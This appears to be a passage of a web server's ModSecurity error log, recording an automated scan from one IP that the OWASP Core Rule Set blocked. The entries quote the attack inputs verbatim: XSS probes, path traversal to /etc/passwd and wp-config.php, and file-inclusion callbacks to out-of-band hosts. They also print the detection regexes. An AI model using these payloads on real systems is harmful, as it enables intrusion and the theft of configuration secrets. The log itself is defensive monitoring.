"digilib.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAqY6IoAAAAr"]
[Tue Aug 29 11:55:46.664661 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6I0AAAAr"]
[Tue Aug 29 11:55:46.775743 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqTvyQAAAAa"]
[Tue Aug 29 11:55:47.746475 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAolKw0AAAAe"]
[Tue Aug 29 11:55:47.840184 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16U8Co-f0AAAq@saEAAAAM"]
[Tue Aug 29 11:55:48.585014 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq4fXEAAAAJ"]
[Tue Aug 29 11:55:51.950640 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16V8Co-f0AAApbUpcAAAAh"]
[Tue Aug 29 11:55:52.100069 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0t9q5uh9tuyiso.oast.site found within TX:1: cjmnijtjmimvgniikdb0t9q5uh9tuyiso.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqeFdYAAAAx"]
[Tue Aug 29 11:55:52.244294 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAApbUqMAAAAh"]
[Tue Aug 29 11:55:52.606691 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ex1bpqxxctrpk.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ex1bpqxxctrpk.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAolKyIAAAAe"]
[Tue Aug 29 11:55:52.723432 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAAolKygAAAAe"]
[Tue Aug 29 11:55:53.801620 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0hyefhta5wmpa8.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0hyefhta5wmpa8.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAq4fZAAAAAJ"]
[Tue Aug 29 11:55:53.868344 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAq4fZEAAAAJ"]
[Tue Aug 29 11:55:53.899707 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqSw1gAAAAN"]
[Tue Aug 29 11:55:55.639444 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqeFewAAAAx"]
[Tue Aug 29 11:55:56.591813 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAq@sbYAAAAM"]
[Tue Aug 29 11:55:56.713236 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAqSw2gAAAAN"]
[Tue Aug 29 11:55:57.576284 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqeFfsAAAAx"]
[Tue Aug 29 11:55:58.618736 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAqTv0gAAAAa"]
[Tue Aug 29 11:55:58.716812 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq5@I4AAAAK"]
[Tue Aug 29 11:55:59.891076 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAAq5@JgAAAAK"]
[Tue Aug 29 11:56:00.626640 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAqY6N4AAAAr"]
[Tue Aug 29 11:56:01.533478 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqTv1cAAAAa"]
[Tue Aug 29 11:56:01.561044 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAApa-Q8AAAAg"]
[Tue Aug 29 11:56:02.585637 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAArB1ukAAAAV"]
[Tue Aug 29 11:56:02.688160 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqY6O8AAAAr"]
[Tue Aug 29 11:56:03.535696 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAqeFhMAAAAx"]
[Tue Aug 29 11:56:03.536814 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAArC7d4AAAAW"]
[Tue Aug 29 11:56:03.606639 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAAq5@LQAAAAK"]
[Tue Aug 29 11:56:04.620449 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1vYAAAAV"]
[Tue Aug 29 11:56:04.739061 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqeFiMAAAAx"]
[Tue Aug 29 11:56:05.603506 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@seoAAAAM"]
